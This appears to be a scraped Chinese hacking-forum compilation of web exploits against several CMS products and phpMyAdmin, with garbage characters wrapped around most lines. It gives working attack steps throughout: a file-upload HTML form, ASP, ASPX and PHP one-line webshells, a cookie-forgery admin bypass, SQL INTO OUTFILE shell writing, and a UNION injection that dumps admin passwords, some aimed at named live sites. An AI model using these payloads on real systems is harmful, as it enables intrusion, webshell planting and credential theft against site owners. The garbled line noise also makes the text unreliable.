1 V! D' h& O5 G) WYxShop易想购物商城4.7.1版本任意文件上传漏洞: H1 t% O I c0 k/ c
* _6 T! U8 I s+ X9 N/ P4 n1 z
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
4 T; G/ p, ~. h# \/ j) t- C跳转到网站根目录上传任意文件。
0 W8 j! ~+ d& P+ Z如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件( J' R/ c- G% Q* J
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">' F4 u( T2 Q3 R* l- A$ z
Upload a new file:<br>
6 _% c/ q$ \3 r8 J4 [<input type="file" name="NewFile" size="50"><br>
) d# H- m3 C8 L, V0 X" S# [- p<input id="btnUpload" type="submit" value="Upload">
, p% b9 t2 L% w! l! p</form>
1 ~6 h" K# {- q0 i-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 w0 g, `+ H% M9 ^ b% I/ t# a
: K7 p; K! ~0 a8 }/ x6 }SDcms 后台拿webshell
, D6 B, S' l0 Q4 ^- M
# r5 x4 C3 g, C! L* K# z* }第一种方法:
* V7 b: c! o S进入后台-->系统管理-->系统设置-->系统设置->网站名称;. R9 [) F$ k2 J6 {
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
2 ?$ }0 B! P" O用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。5 u4 ]5 r" n y8 g0 H* |4 I6 Z, S
第二种方法:8 L7 ^3 Y- s& n9 w2 O, l( w+ O
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
$ J+ Y2 o" F3 P n) h1 T& X在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!6 I* G* n. e" h/ \2 {4 q9 J
第三种方法:
8 g. ?/ s$ p4 M O1 R3 I7 E进入后台-->界面管理-->模板文件管理-->创建文件4 }; E% l9 A0 ?' m* m
文件名写入getshell.ashx6 g$ r2 ?" P' o f
内容写入下面内容:
7 ?* p8 A- l# F* H: ~/====================复制下面的=========================/9 h `6 i- s! }/ I2 w) \
<%@ WebHandler Language="C#" Class="Handler" %>
0 y: |, E! Y5 a9 F" P9 |using System; `8 g b: I& c
using System.Web;
4 m; e2 \$ I7 s, [& s! y/ q5 Uusing System.IO;/ r+ L" u2 c9 |" E8 f& u. }' N
public class Handler : IHttpHandler {
9 A( |& a9 \% upublic void ProcessRequest (HttpContext context) {* x& D" C+ F) g
context.Response.ContentType = "text/plain";
) W4 |' u. F5 f: Y, Z2 NStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));! A* P C5 A" V l- x
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
2 z+ V- V8 \, d! W' G1 Sfile1.Flush();
: B4 C6 q) ^& L/ Jfile1.Close();
- O- q) w' u3 G$ m, B# U% p# |; t}- h5 m. y3 X0 e# F/ [
public bool IsReusable {8 C: I; o2 G8 l3 w$ x
get {" v4 }2 e7 `9 S) O
return false;3 C" p4 C. Y4 S' b
}3 R# q V. D( t
}
\- f6 T! `- |, K3 F/ u8 ~( I% L}; [( S5 ?: ~" m* J5 q
/=============================================/* ~9 d0 T" D0 e( _* b
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
: q% V0 v$ n5 n' \9 P会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接+ z1 H! R* s/ ^: d( q* Q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 e2 N, {% L- {0 g
( r) Q# M4 r) V& Y2 u6 h5 HESCMS网站管理系统0day
5 K, H3 N6 E, W( {) L
' j7 M- _2 O# O# F后台登陆验证是通过admin/check.asp实现的
( c, }5 p/ }4 W }) O: ^6 v1 R/ i/ d" _0 y) y+ z
首先我们打开http://target.com/admin/es_index.html! a9 l$ Q" U+ p
然后在COOKIE结尾加上+ D1 e/ n' L5 Q# C7 f
; ESCMS$_SP2=ES_admin=st0p;; Z5 `: u6 Y* \8 s3 ]4 j
修改,然后刷新7 F+ o) ?# f" H0 O: h, H0 K
进后台了嘎.." C, B$ x- v8 z5 Q% U* P
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL1 Q5 y& P: V3 w8 O$ q
8 T) `5 i b$ q9 K* F6 D
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
- w, z! T2 |8 d! k3 w! C7 E嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
& U8 l% W0 U9 F" N( a/ O存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败.." o5 T$ ?& e4 M" `' b
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了3 }! h& p, z1 U: I8 M
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 V8 i2 }7 j/ p- Y9 r$ d9 `
* J9 c# ]. s( J% D
宁志网站管理系统后台无验证漏洞及修复/ m1 J4 t7 _: w0 d9 r3 B
* i, a: |, l: |. |3 G网上搜了一下,好像没有发布.如有雷同纯粹巧合!
. Q" l! D. A8 O; r4 _# o/ J P官方网站:www.ningzhi.net5 D/ u( N( X6 M
学校网站管理系统 V.2011版本
' J) d9 U+ G/ Y+ L$ g7 Phttp://down.chinaz.com/soft/29943.htm " E) E8 @3 i/ m. B9 ?6 U! \
其它版本(如:政府版等),自行下载.# l7 j1 S1 H5 |9 G N# s. V' @
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~2 z7 @! u _) n" i! `4 c( z# n1 n
login.asp代码如下:
9 Q9 U7 h$ }6 D P<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
8 R, e& @6 I% O/ cmanage.asp代码我就不帖出来了.反正也没验证.$ W* f9 E" W, u' w W& Z
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
# O: w0 J+ ?# h* v/ _8 |: K& l漏洞利用:+ g0 F# {. C, @8 Q
直接访问http://www.0855.tv/admin/manage.asp
% `. Q' t0 U/ C+ I( T% F0 H- x% g* G数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web54 w5 z" k1 {' x) e0 x4 `# C
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! A5 ]4 H; X. |/ L2 K4 j
& r+ q5 r& o. n$ m- [7 t; \7 ~phpmyadmin拿shell的四种方法总结及修复3 I% o/ s/ R' ~! h) W& O
+ w9 n/ c) Y# Q4 q2 F: G! A' T
方法一:
, G( r" P: ^& O, x7 K6 z; b- G0 ~( wCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
& d, l) I, X2 J, DINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');. n! \3 T7 N; n3 m
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';) K( K! F s: N6 K% ?
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
* G; y( |" s' `$ n 一句话连接密码:7on
9 S7 [" e1 Q) u6 i" ~' k$ `/ N9 b方法二:
8 Z; z+ u" V, p2 M* l2 e读取文件内容: select load_file('E:/xamp/www/s.php');
+ B6 \: u6 k. i0 _# i写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
/ \$ p/ p- s9 I! [2 N% S* \cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
- R1 j6 F! o/ ^7 I方法三:
" i) |7 g: C/ x3 OJhackJ版本 PHPmyadmin拿shell
9 ~1 _, n/ _" C& T2 oCreate TABLE study (cmd text NOT NULL);. n, @5 R- s; n9 v: d
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');2 ?! E! S& l* w* R% u8 r+ d
select cmd from study into outfile 'E:/wamp/www/7.php';; V* }# K4 {* h0 ~ r8 p% E
Drop TABLE IF EXISTS study;; I* E$ B7 y. d$ v0 |' ]! A n
<?php eval($_POST[cmd])?>) s7 l7 R* m9 d, a
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 s8 }. y( ~$ [- |$ O9 y2 `) m: gINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1, b! B! J, E6 G- j
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
# z! r+ Q* Y, _3 r1 P+ d% ~6 aDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。" F5 ` t5 j$ l& `* h
方法四:; m, J! Z7 s9 h: [, Y
select load_file('E:/xamp/www/study.php');
# w- z! s( h' K3 w. n4 \) \2 {6 Kselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'6 Y; ?3 _& j4 z a3 R( t& s
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
f5 e/ S: K- R-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
; I+ v r# u0 u7 e) n$ U! e! {$ e. o7 l1 w# b8 V
NO.001中学网站管理系统 Build 110628 注入漏洞
! \' u. t6 Q1 T, o. q) x
2 o# Q. t" G3 ~ D1 g# i- @NO.001中学网站管理系统功能模块:* K' ?) T$ E2 C. O
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
3 x, M6 o5 C+ v0 L1 ]7 h- @/ n2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
W( d8 F9 \ S5 v! h3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
+ Z4 b4 L+ F9 j* Z4.视频图片管理:一级分类,动态添加视频或者图片等信息
[$ J" ^" E# Z0 ^, X5.留言管理:对留言,修改,删除、回复等管理; b5 M1 D2 w% O: C5 V, Y; Y& R
6.校友频道:包括校友资料excel导出、管理等功能
5 z3 I5 P, ^9 @0 {; p# R7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
- `/ `; z( X0 E默认后台:admin/login.asp2 y) k0 r" q P
官方演示:http://demo.001cms.net
/ _ w2 z1 k/ q2 i* h: a源码下载地址:http://down.chinaz.com/soft/30187.htm
, b9 n( p- g: {# [EXP:/ w* L2 v2 c/ H8 m# E* q* B
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
$ \( K3 E" c& T4 `# y2 w测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
/ T5 n0 ]" M( l4 b) `getshell:后台有备份,你懂的
! ]! w$ v1 w1 y( i: H3 Y1 p% a另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。# ^4 s! k1 f# K9 i9 F
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |